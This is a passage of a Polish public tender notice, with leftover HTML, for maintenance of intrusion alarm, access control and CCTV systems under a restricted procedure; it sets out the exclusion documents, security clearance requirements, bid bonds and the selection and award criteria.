d)	informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy oraz, odnośnie skazania za wykroczenie na karę aresztu, w zakresie określonym przez zamawiającego na podstawie art. 24 ust. 5 pkt 5 i 6 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu;
Podstawy Wykluczenia badane na etapie złożenia jednolitego oświadczenia 
e)	oświadczenie wykonawcy o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne- badane jest na etapie składania wniosków na podstawie JO (jest zawarte w treści oświadczenia).
f)	oświadczenie wykonawcy o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo  w przypadku wydania takiego wyroku lub decyzji  dokumentów potwierdzających dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia               w sprawie spłat tych należności badane jest na etapie składania etapie składania wniosków na podstawie JO (jest zawarte w treści oświadczenia).
g)	oświadczenie wykonawcy o braku wydania prawomocnego wyroku sądu skazującego za wykroczenie na karę ograniczenia wolności lub grzywny w zakresie określonym przez zamawiającego na podstawie art. 24 ust. 5 pkt 5 i 6 ustawy badane jest na etapie składania wniosków na podstawie JO (jest zawarte w treści oświadczenia).
h)	oświadczenie wykonawcy o braku wydania wobec niego ostatecznej decyzji administracyjnej o naruszeniu obowiązków wynikających z przepisów prawa pracy, prawa ochrony środowiska lub przepisów o zabezpieczeniu społecznym w zakresie określonym przez zamawiającego na podstawie art. 24 ust. 5 pkt 7 ustawy badane jest na etapie składania wniosków na podstawie JO (jest zawarte w treści oświadczenia).
i)	oświadczenie wykonawcy o niezaleganiu z opłacaniem podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2016 r. poz. 716) badane jest na etapie składania wniosków na podstawie JO (jest zawarte w treści oświadczenia);
j)	który w sposób zawiniony poważnie naruszył obowiązki zawodowe, co podważa jego uczciwość, w szczególności gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co zamawiający jest w stanie wykazać za pomocą stosownych środków dowodowych, badane jest na etapie składania wniosków na podstawie JO (jest zawarte w treści oświadczenia);
k) jeżeli wykonawca lub osoby, o których mowa w ust. 1 pkt 14, uprawnione do reprezentowania wykonawcy pozostają w relacjach określonych w art. 17 ust. 1 pkt 24 z:
	zamawiającym,
	osobami uprawnionymi do reprezentowania zamawiającego,
	członkami komisji przetargowej,
	osobami, które złożyły oświadczenie, o którym mowa w art. 17 ust. 2a
 chyba że jest możliwe zapewnienie bezstronności po stronie zamawiającego w inny sposób niż przez wykluczenie wykonawcy z udziału w postępowaniu, badane jest na etapie składania wniosków na podstawie JO (jest zawarte w treści oświadczenia);
l) który, z przyczyn leżących po jego stronie, nie wykonał albo nienależycie wykonał w istotnym stopniu wcześniejszą umowę w sprawie zamówienia publicznego lub umowę koncesji, zawartą z zamawiającym, o którym mowa w art. 3 ust. 1 pkt 14, co doprowadziło do rozwiązania umowy lub zasądzenia odszkodowania, badane jest na etapie składania wniosków na podstawie JO (jest zawarte w treści oświadczenia).

Dokumenty wskazane w ppkt 1.3 dostarczone na wezwanie Zamawiającego na podstawie art. 26 ust 2f Pzp. mogą być złożone  w oryginale lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. 

Jeżeli Wykonawca złożył wniosek na kilka części Zamawiający dopuszcza złożenie dokumentów w celu wykazania braku podstaw do wykluczenia z postępowania, o których mowa w art. 24 ust. 1 oraz ust. 5 ustawy Pzp, w zakresie wskazanym przez Zamawiającego powyżej,  w jednym osobnym komplecie dokumentów oznaczonym dla jakich części jest on złożony oraz trwale połączonym w sposób uniemożliwiający ich rozkompletowanie (np. zszyty).

1.4.	Dokumenty jakie należy złożyć w przypadku, gdy Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej:
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w § 5 pkt 1 rozporządzenia Ministra Rozwoju           z dnia 27 lipca 2016 r.  w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2016 poz. 1126) (część III informacji  pkt 1 ppkt 1.3 lit. d)
 składa informację z odpowiedniego rejestru albo, w przypadku braku takiego rejestru, inny równoważny dokument wydany przez właściwy organ sądowy lub administracyjny kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dotyczy informacja albo dokument, w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 oraz ust. 5 pkt 5 i 6 ustawy;
 składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie zalega z opłacaniem podatków, opłat, albo że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
b) nie otwarto jego likwidacji ani nie ogłoszono upadłości.
Dokumenty, o których mowa w § 5 pkt 1 oraz 4 rozporządzenia (część III informacji  pkt 1 ppkt 1.3 lit. a i d)  powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu. Dokument, o którym mowa w § 5 pkt 2 rozporządzenia (część III informacji  pkt 1 ppkt 1.3 lit. b) powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem tego terminu.
Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w   § 5 pkt 1,2,4 rozporządzenia część III informacji  pkt 1 ppkt 1.3 lit. a, b, d, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. Powyższe dokumenty w formie oświadczenia, o których mowa w § 5 pkt 1 oraz  pkt 4 rozporządzenia (część III informacji  pkt 1 ppkt 1.3 lit. a i d)  powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu. Dokument, o którym mowa w § 5 ust 1 pkt 2 rozporządzenia (część III informacji  pkt 1 ppkt lit. b powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem tego terminu.
W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę, zamawiający może zwrócić się do właściwych organów odpowiednio kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, o udzielenie niezbędnych informacji dotyczących tego dokumentu.
Wykonawca mający siedzibę na terytorium Rzeczypospolitej Polskiej, w odniesieniu do osoby mającej miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, której dotyczy dokument wskazany w § 5 pkt 1 rozporządzenia (część III informacji  pkt 1 ppkt 1.3 lit. d) , składa dokument, o którym mowa w § 7 ust. 1 pkt 1 rozporządzenia, w zakresie określonym w art. 24 ust. 1 pkt 14 i 21 oraz ust. 5 pkt 6 ustawy.
Jeżeli w kraju, w którym miejsce zamieszkania ma osoba, której dokument miał dotyczyć, nie wydaje się takich dokumentów, zastępuje się go dokumentem zawierającym oświadczenie tej osoby złożonym przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na miejsce zamieszkania tej osoby. Powyższe dokumenty w formie oświadczenia, o których mowa w § 5 pkt 1 oraz 4 rozporządzenia (część III informacji pkt 1 ppkt 1.3 lit. a i d)  powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu. Dokument, o którym mowa w § 5 pkt 2 rozporządzenia (część III informacji  pkt 1 ppkt lit. b) powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem tego terminu.
W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę, zamawiający może zwrócić się do właściwych organów kraju, w którym miejsce zamieszkania ma osoba, której dokument dotyczy, o udzielenie niezbędnych informacji dotyczących tego dokumentu.
UWAGA !!!
Wykonawca w celu wykazania braku podstaw do wykluczenia na podstawie art. 24 ust. 11 Pzp., w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji,                o której mowa w art. 51 ust. 1a (informacja o wynikach oceny spełnienia warunków udziału w postępowaniu i otrzymanych ocenach), przekazuje Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 Pzp. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. Oświadczenie wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej. W przypadku przynależności do tej samej grupy kapitałowej wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu. Zamawiający zamieści przykładowy wzór ww. oświadczenia na swojej stronie internetowej wraz z informacją o wynikach oceny spełnienia warunków udziału w postepowaniu i otrzymanych ocenach.
Wykonawca ma obowiązek złożyć dokumenty dotyczące podmiotu na zasobach których polega na wezwanie Zamawiającego zgodnie z art. 26 ust 2f Pzp.:
	dokumenty o których mowa w części III Informacji pkt 1 ppkt 1.3 (dotyczące wykazania braku podstaw do wykluczenia z art. 24 ust. 1 pkt 12-22 oraz art. 24 ust. 5 Pzp.);
	oraz dokumenty dotyczące spełniania warunków udziału w postępowaniu z art. 22 ust. 1b pkt 2,3 (o którym mowa w część III Informacji pkt 1 ppkt 1.2.), wyłącznie zakresie, w jakim Wykonawca powołuje się na  zasoby podmiotu trzeciego;
	oświadczenia zgodnie z załącznikiem nr 4 do informacji potwierdzającego odpowiednio że podmiot trzeci nie podlega wykluczeniu na podstawie art. 24 ust 1 pkt 12-22  oraz art. 24 ust 5 ustawy Pzp. w związku z  § 5 pkt 5-9 ROZPORZĄDZENIA MINISTRA ROZWOJU z dnia 26 lipca 2016 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy w postępowaniu o udzielenie zamówienia).
Zamawiający wezwie Wykonawcę, który na podstawie kryterium selekcji zajmie miejsce od 1 do 5 oraz który zamierza powierzyć wykonanie części zamówienia Podwykonawcy/Podwykonawcom na podstawie art. 26 ust.2f Pzp. o niżej wskazane dokumenty:
	dokumenty o których mowa w części III Informacji pkt 1 ppkt 1.3 (dotyczące wykazania braku podstaw do wykluczenia z art. 24 ust. 1 pkt 12-22 oraz art. 24 ust. 5 Pzp.);
	oświadczenia zgodnie z załącznikiem nr 4 do informacji potwierdzającego odpowiednio że podwykonawca  nie podlega wykluczeniu na podstawie art. 24 ust 1 pkt 12-22  oraz art. 24 ust 5 ustawy Pzp. w związku z  § 5 pkt 5-9 ROZPORZĄDZENIA MINISTRA ROZWOJU z dnia 26 lipca 2016 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy w postępowaniu o udzielenie zamówienia).

</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1.2.	W celu wykazania spełniania przez Wykonawcę warunków, o których mowa 
w art. 22 ust. 1 pkt 2 ustawy Pzp, na wezwanie na podstawie art. 26 ust. 2f Pzp. przez Zamawiającego należy dostarczyć:
a)  wykaz wykonanych bądź wykonywanych usług osobno dla każdej części wraz                         z dowodami określającymi, iż usługi te zostały wykonane lub są wykonywane należycie, zgodnie z zapisem wskazanym w informacji część I pkt 10.2 - zał. nr 8 do informacji; 

b)  informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy,                w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania wniosków  o dopuszczenie do udziału w postępowaniu na kwotę: 
	80 000,00 zł dla części nr 2;

c) ważną koncesję MSW/MSWiA na prowadzenie działalności gospodarczej w zakresie ochrony osób i mienia realizowanej w formie zabezpieczenia technicznego na podstawie ustawy z dnia 22.08.1997 r. O ochronie osób i mienia wydanej przez Ministra Spraw Wewnętrznych upoważniającej do realizacji zadań  w zakresie zabezpieczenia technicznego (Dz. U. z 1997 r. nr 114, poz. 740 z póź. zm.);

d) ważne Świadectwo Bezpieczeństwa Przemysłowego III stopnia, potwierdzające zdolność do ochrony informacji niejawnych o klauzuli poufne zgodnie z art. 54, art. 55 ustawy z dnia 5 sierpnia 2010 r. o ochronie informacji niejawnych (Dz. U. z 2016 r. poz. 1167);

e) ważne zaświadczenie o odbyciu szkolenia  w zakresie ochrony informacji niejawnych zgodnie z art. 19, art. 20 ust. 1 w związku z art. 2 pkt 14 (kierownika jednostki organizacyjnej) ustawy  z dnia 5 sierpnia 2010 r. o ochronie informacji niejawnych (Dz. U. z 2016r. poz.1167);

 f) ważne poświadczenie bezpieczeństwa do dostępu do informacji niejawnych, zgodnie        z art. 21 ust. 1 w związku z art. 2 pkt 14 (kierownika jednostki organizacyjnej) ustawy                    z dnia 5 sierpnia 2010 r. o ochronie informacji niejawnych (Dz. U. z 2016 r. poz. 1167);
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br />Dokumenty W ZAKRESIE KRYTERIÓW SELEKCJI należy złożyć wraz w wnioskiem tj.	Wykaz wykonanych bądź wykonywanych usług  kryterium kwalifikacji (zał. nr 5 do informacji) wraz z referencjami.</div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1.1.	Dokumenty wymagane do wniosku w celu dokonania jego oceny:
       Wykonawca przygotowując wniosek zobowiązany jest dołączyć do druku Wniosek (zał. nr 1) nw. dokumenty:
	Jednolite oświadczenie (zał. nr 2 do informacji);
	Oświadczenie o oddaniu do dyspozycji niezbędnych zasobów na okres od  do  w celu korzystania z nich przy wykonywaniu zamówienia - (zał. nr 3 do informacji) złożony                     w oryginale i podpisany przez osobę(y) upoważnione do reprezentowania podmiotu oddającego zasoby do dyspozycji  w przypadku korzystania z zasobów innych podmiotów;
	Wykaz wykonanych bądź wykonywanych usług  kryterium kwalifikacji (zał. nr 5 do informacji) wraz z referencjami.

W przypadku jeżeli podmiot trzeci będzie realizował zamówienie w części do której zachodzi konieczność dostępu do informacji niejawnych Wykonawca, który zajmie miejsce od 1 do 5 na podstawie kryterium selekcji będzie zobowiązany do dostarczenia na podstawie art. 26 ust.2f  Pzp niżej wskazanych dokumentów od podmiotu trzeciego:
a)	ważną koncesję MSW/MSWiA na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia wydanej na podstawie ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (Dz.U.05.145.1221  tekst jednolity);
b)	ważne Świadectwo Bezpieczeństwa Przemysłowego III stopnia potwierdzające zdolność do ochrony informacji niejawnych o klauzuli poufne zgodnie z art. 54, art. 55 ustawy                 z dnia 5 sierpnia 2010 r. o ochronie informacji niejawnych (Dz. U. z 2016 r., poz. 1167)            - dotyczy podmiotu trzeciego - kserokopia potwierdzona za zgodność z oryginałem aktualnego Świadectwa Bezpieczeństwa Przemysłowego III stopnia.
c)	ważne zaświadczenie o odbyciu szkolenia w zakresie ochrony informacji niejawnych zgodnie z art.19, art. 20 ust 1 w związku z art. 2 ust. 14 ustawy z dnia  5 sierpnia 2010 r. o ochronie informacji niejawnych (Dz. U. z 2016 r., poz. 1167) - dotyczy podmiotu trzeciego  kserokopia potwierdzona za zgodność z oryginałem aktualnego zaświadczenia,
d)	ważne poświadczenie bezpieczeństwa do dostępu do informacji niejawnych, zgodnie z art. 21 ust. 1 w związku z art. 2 ust.14 ustawy z dnia 5 sierpnia 2010 r. o ochronie informacji niejawnych (Dz. U. z 2016 r., poz. 1167)  dotyczy podmiotu trzeciego  kserokopia potwierdzona za zgodność z oryginałem aktualnego Poświadczenia Bezpieczeństwa 

 W przypadku jeżeli Podwykonawca będzie realizował zamówienie w części, do której zachodzi konieczność dostępu do informacji niejawnych Wykonawca, który zajmie miejsce od 1 do 5 na podstawie kryterium selekcji będzie zobowiązany do dostarczenia na podstawie art. 26 ust.2f  Pzp niżej wskazanych dokumentów od podwykonawcy:
a)	ważną koncesję MSW/MSWiA na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia wydanej na podstawie ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (Dz.U.05.145.1221  tekst jednolity);
b)	ważne Świadectwo Bezpieczeństwa Przemysłowego III stopnia potwierdzające zdolność do ochrony informacji niejawnych o klauzuli poufne zgodnie z art. 54, art. 55 ustawy z dnia 5 sierpnia 2010 r. o ochronie informacji niejawnych (Dz. U. z 2016 r., poz. 1167) - dotyczy Podwykonawcy -   kserokopia potwierdzona za zgodność z oryginałem ważnego Świadectwa Bezpieczeństwa Przemysłowego III stopnia.
c)	ważne zaświadczenie o odbyciu szkolenia w zakresie ochrony informacji niejawnych zgodnie z art.19, art. 20 ust 1 w związku z art. 2 ust. 14 (kierownika jednostki organizacyjnej) ustawy z dnia  5 sierpnia 2010 r. o ochronie informacji niejawnych (Dz. U. z 2010 r., poz. 1167) - dotyczy Podwykonawcy  kserokopia potwierdzona za zgodność z oryginałem ważnego zaświadczenia;
d)	ważne poświadczenie bezpieczeństwa do dostępu do informacji niejawnych, zgodnie z art. 21 ust. 1 w związku z art. 2 ust.14 (kierownika jednostki organizacyjnej) ustawy z dnia 5 sierpnia 2010 r. o ochronie informacji niejawnych (Dz. U. z 2016 r., poz. 1167)  dotyczy Podwykonawcy  kserokopia potwierdzona za zgodność z oryginałem ważnego Poświadczenia Bezpieczeństwa 
13.2.   Podwykonawca przystępując do realizacji przedmiotu zamówienia zobowiązuje się przestrzegać przepisy o ochronie informacji niejawnych określone w ustawie o ochronie informacji niejawnych (Dz. U. z 2016 r. poz. 1167) oraz zapisy Instrukcji bezpieczeństwa przemysłowego.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg ograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />2.1.	Zamawiający będzie wymagał (na II etapie postępowania tj. składanie ofert) wniesienia wadium  w wysokości:
	cześć nr 1 w kwocie  2 200,00 zł (słownie zł: dwa tysiące dwieście)
	cześć nr 2 w kwocie  7 000,00 zł (słownie zł: siedem tysięcy)
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  5<br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  5<br />
                Kryteria selekcji wykonawców:
                <br />14.	Opis kryteriów, którymi zamawiający będzie się kierował przy wyborze Wykonawców, którzy zostaną zaproszeni do składania ofert.
14.1. Zamawiający podczas oceny wniosków w celu wyboru Wykonawców, którzy zostaną zaproszeni do składania ofert będzie brał pod uwagę końcową liczbę punktów wyliczoną               w nw. sposób:             
KRYTERIUM KWALIFIKACJI (K1):
Zamawiający wymaga w celu oceny wniosków w zakresie kryterium selekcji przedstawienia wykazu usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych, również wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania wniosków a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie:
usługi dotyczące konserwacji i przeglądu SSWIN, SKD,CCTV do wykonania których, niezbędne było posiadanie świadectwa bezpieczeństwa przemysłowego III stopnia                    w kwocie:
	Dla części nr 1 :
na co najmniej 30 000,00 zł brutto każda;

	Dla części nr 2 :
na co najmniej 50 000,00 zł brutto każda; 

z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi te zostały wykonane (załącznik nr 5 do informacji), oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku  świadczeń okresowych lub ciągłych są wykonywane, a jeżeli                   z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy (zał. nr 6 do informacji); w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu. W odniesieniu do nadal wykonywanych usług - część zrealizowanej faktycznie usługi musi wypełnić wymogi określone przez Zamawiającego na dzień składania wniosku.  

UWAGA!
Wykonawca za wykazanie ww. 4 usług otrzyma łącznie 100 pkt. W przypadku gdy Wykonawca wskaże więcej usług niż to jest wymagane nie będą one brane pod uwagę przy podliczaniu punktów. 

Za każdą wykazaną usługę (lecz nie więcej niż cztery) spełniającą ww. wymogi, Wykonawca otrzyma 25 pkt. 



Ocena Wykonawcy  (Kryterium  K1):
Wnioski oceniane będą wg wzoru: 

K1 = Ko x 100%
Ko     - wartość punktowa wniosku ocenianego (od 0 -100 pkt)

W przypadku kiedy Wykonawcy otrzymają taka sama liczbę punktów za wykazane usługi                     w oparciu o ww. zapisy warunkiem zaproszenia do składania ofert będzie wyższa wartość kwot brutto z trzech najwyższych wartości usług wykazanych przez Wykonawcę.
Wykonawca w celu uzyskania dodatkowych punktów w kryterium selekcji nie może powoływać się na zasoby podmiotu trzeciego. 

Zamawiający będzie przydzielał punkty wyłącznie na podstawie wykazu wykonanych bądź wykonywanych usług (zał. nr 5 do informacji) wraz z referencjami, które Wykonawca złoży wraz z wnioskiem.

Zamawiający zaprosi do złożenia oferty nie więcej niż pięciu Wykonawców, którzy spełniają warunki udziału w postepowaniu oraz uzyskają najwyższą punktację w ww. kryterium selekcji.

Wraz z zaproszeniem do składania ofert Zamawiający przekaże Wykonawcy Specyfikację Istotnych Warunków Zamówienia. Zamawiający przekaże zaproszonym Wykonawcom SIWZ wraz                 z załącznikami drogą elektroniczną lub faksem.
Wykonawca nie zaproszony do składania ofert będzie traktowany jako wykluczony z postępowania o udzielnie zamówienia.

</div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td> TERMIN WYKONANIA I PRZEDSTAWIENIA OFERTY USUNIĘCIA AWARII </td><td>40</td></tr><tr><td>CENA  OFERTY BRUTTO ZA KONSERWACJĘ I PRZEGLĄD  </td><td>50</td></tr><tr><td>CENA  OFERTY BRUTTO USŁUG SERWISOWYCH </td><td>10</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

